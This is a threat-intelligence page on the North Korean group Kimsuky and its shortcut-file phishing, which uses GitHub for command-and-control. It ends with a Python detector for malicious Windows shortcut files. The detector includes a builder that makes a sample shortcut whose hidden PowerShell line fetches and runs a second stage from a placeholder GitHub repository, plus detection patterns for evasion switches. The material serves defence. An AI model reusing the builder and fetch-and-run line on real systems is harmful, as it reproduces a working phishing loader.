Kimsuky
Also known as: Velvet Chollima, Emerald Sleet, Black Banshee, Thallium
North Korean state-sponsored group focused on intelligence gathering, best known for credential-phishing campaigns.
Associated Intelligence
Kimsuky Targets Orgs with PebbleDash
Kimsuky has been observed using new PebbleDash-based tools in recent campaigns against a range of organizations. The tooling overlaps with the AppleSeed malware cluster already attributed to the group, indicating a potential escalation in activity rather than a one-off. Organizations should confirm that their security controls can detect and respond to these tools.
DPRK Phishing Attacks
North Korea-linked actors are targeting South Korean organizations with phishing emails carrying malicious LNK (Windows shortcut) attachments. When opened, the shortcut drops a decoy PDF and runs a PowerShell script, and the chain uses GitHub repositories as command-and-control (C2) infrastructure. Affected organizations should treat shortcut files arriving by email as suspicious and inspect them before opening.
DPRK Hackers Use GitHub as C2
Threat actors linked to North Korea have been observed using GitHub as command-and-control infrastructure in multi-stage attacks on South Korean organizations. The first stage is an obfuscated Windows shortcut (LNK) file that drops a decoy PDF, with later stages retrieved from GitHub. Affected organizations should review their security controls and monitor for outbound GitHub traffic from hosts, users or processes that have no reason to generate it.
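The two entries above describe the same first stage: an obfuscated shortcut that launches PowerShell, hides its command line, and pulls a decoy PDF plus a second stage from GitHub. The script below is an added example, not code from the page or from any vendor report, that parses the public Shell Link (MS-SHLLINK) format far enough to recover the target, arguments and icon, then triages those fields for that pattern. The LNK builder, the sample shortcut and the GitHub repository paths in it are constructed for the demonstration and are not real campaign indicators.

```python
"""Parse a Windows .lnk (Shell Link) and triage it for the LNK-phishing pattern
described above.  Added example; build_lnk() and the two samples at the bottom
are constructed for the demo, and the GitHub URLs are placeholders."""
import re
import struct

# ShellLinkHeader constants from MS-SHLLINK (the public format specification)
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
HAS_IDLIST, HAS_LINKINFO, HAS_NAME, HAS_RELPATH = 0x01, 0x02, 0x04, 0x08
HAS_WORKDIR, HAS_ARGS, HAS_ICON, IS_UNICODE = 0x10, 0x20, 0x40, 0x80
SW_SHOWMINNOACTIVE = 7  # run minimized without focus; typical of malicious LNKs


def parse_lnk(data: bytes) -> dict:
    """Return the StringData fields and ShowCommand of a Shell Link."""
    if (len(data) < 0x4C or struct.unpack_from("<I", data, 0)[0] != 0x4C
            or data[4:20] != LNK_CLSID):
        raise ValueError("not a Shell Link file")
    flags, = struct.unpack_from("<I", data, 0x14)
    show_cmd, = struct.unpack_from("<I", data, 0x3C)
    pos = 0x4C
    if flags & HAS_IDLIST:                      # skip LinkTargetIDList
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINKINFO:                    # skip LinkInfo (size-prefixed)
        pos += struct.unpack_from("<I", data, pos)[0]
    fields = {"show_command": show_cmd}
    for bit, name in ((HAS_NAME, "name"), (HAS_RELPATH, "relative_path"),
                      (HAS_WORKDIR, "working_dir"), (HAS_ARGS, "arguments"),
                      (HAS_ICON, "icon_location")):
        if not flags & bit:
            continue
        count, = struct.unpack_from("<H", data, pos)   # CountCharacters
        pos += 2
        if flags & IS_UNICODE:
            fields[name] = data[pos:pos + 2 * count].decode("utf-16-le")
            pos += 2 * count
        else:
            fields[name] = data[pos:pos + count].decode("cp1252")
            pos += count
    return fields


def build_lnk(relative_path, arguments, icon_location, show_command=1) -> bytes:
    """Minimal Shell Link carrying only StringData; used to make offline samples."""
    flags = IS_UNICODE | HAS_RELPATH | HAS_ARGS | HAS_ICON
    header = struct.pack("<I16sIIQQQIIIHHII", 0x4C, LNK_CLSID, flags, 0x20,
                         0, 0, 0, 0, 0, show_command, 0, 0, 0, 0)

    def sd(s):  # CountCharacters + UTF-16LE string
        return struct.pack("<H", len(s)) + s.encode("utf-16-le")
    return header + sd(relative_path) + sd(arguments) + sd(icon_location)


URL_RE = re.compile(r"https?://([a-z0-9.-]+)[^\s'\"]*", re.I)
EVASION_RE = re.compile(
    r"-(?:w|win|windowstyle)\s+hidden|-(?:ep|executionpolicy)\s+bypass|"
    r"-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I)
INTERPRETERS = ("powershell", "pwsh", "cmd.exe", "mshta", "wscript", "cscript", "rundll32")


def is_github_host(host: str) -> bool:
    host = host.lower()
    return host == "github.com" or host.endswith((".github.com", ".githubusercontent.com"))


def triage_lnk(data: bytes) -> list:
    """Return human-readable findings; an empty list means nothing suspicious."""
    lnk = parse_lnk(data)
    target = lnk.get("relative_path", "").lower()
    args = lnk.get("arguments", "")
    icon = lnk.get("icon_location", "").lower()
    findings = []
    if any(x in target for x in INTERPRETERS):
        findings.append("target is a command/script interpreter: " + target)
    pad = len(args) - len(args.lstrip())
    if pad >= 64:  # blanks push the real command out of the Properties dialog
        findings.append("arguments hidden behind %d leading blanks" % pad)
    compact = " ".join(args.split())
    if EVASION_RE.search(compact):
        findings.append("PowerShell hidden-window/bypass/encoded switches")
    hosts = sorted({m.group(1).lower() for m in URL_RE.finditer(compact)})
    gh = [h for h in hosts if is_github_host(h)]
    if gh:
        findings.append("fetches content from GitHub (C2/staging): " + ", ".join(gh))
    if gh and re.search(r"\.pdf\b", compact, re.I):
        findings.append("downloads a PDF next to remote code: decoy-document pattern")
    if lnk["show_command"] == SW_SHOWMINNOACTIVE:
        findings.append("ShowCommand=SW_SHOWMINNOACTIVE (runs minimized)")
    if re.search(r"acrobat|acrord32|winword|hwp|\.(?:pdf|docx?|hwp)$", icon):
        findings.append("icon mimics a document viewer: " + icon)
    return findings


# Constructed samples: hypothetical repository and paths, not real indicators.
STAGE = "https://raw.githubusercontent.com/example-user/example-repo/main/"
MALICIOUS_LNK = build_lnk(
    "..\\..\\..\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
    " " * 400 + "-w hidden -ep bypass -c \"$d=$env:TEMP; iwr " + STAGE
    + "notice.pdf -OutFile $d\\notice.pdf; start $d\\notice.pdf; iex (iwr "
    + STAGE + "s2.ps1).Content\"",
    "C:\\Program Files\\Adobe\\Acrobat DC\\Acrobat\\Acrobat.exe",
    show_command=SW_SHOWMINNOACTIVE)
BENIGN_LNK = build_lnk("..\\..\\Program Files\\Notepad++\\notepad++.exe",
                       "D:\\notes\\todo.txt", "")

if __name__ == "__main__":
    for name, blob in (("malicious", MALICIOUS_LNK), ("benign", BENIGN_LNK)):
        print(name, triage_lnk(blob) or ["no findings"])
```

Run it against attachments pulled from the mail gateway: the parser skips the IDList and LinkInfo blocks that real shortcuts carry, so it works on samples in the wild, not only on the constructed ones. The whitespace-padding check matters because the Properties dialog truncates the Target field, which is exactly what the padding exploits; pair the GitHub check with egress logs, since legitimate developer traffic to the same hosts is the obvious false positive.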